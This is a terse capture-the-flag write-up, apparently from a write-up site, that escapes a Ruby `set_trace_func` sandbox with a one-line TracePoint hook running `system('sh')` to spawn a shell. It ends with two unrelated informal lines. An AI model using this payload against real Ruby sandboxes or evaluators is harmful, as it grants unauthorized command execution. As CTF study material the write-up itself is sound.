Rating: 5.0
Use TracePoint to trace the `puts` method in the proc of `set_trace_func`, and get shell.
```rubyTracePoint.trace(:c_call) do system('sh') end```
WTF
I don't remember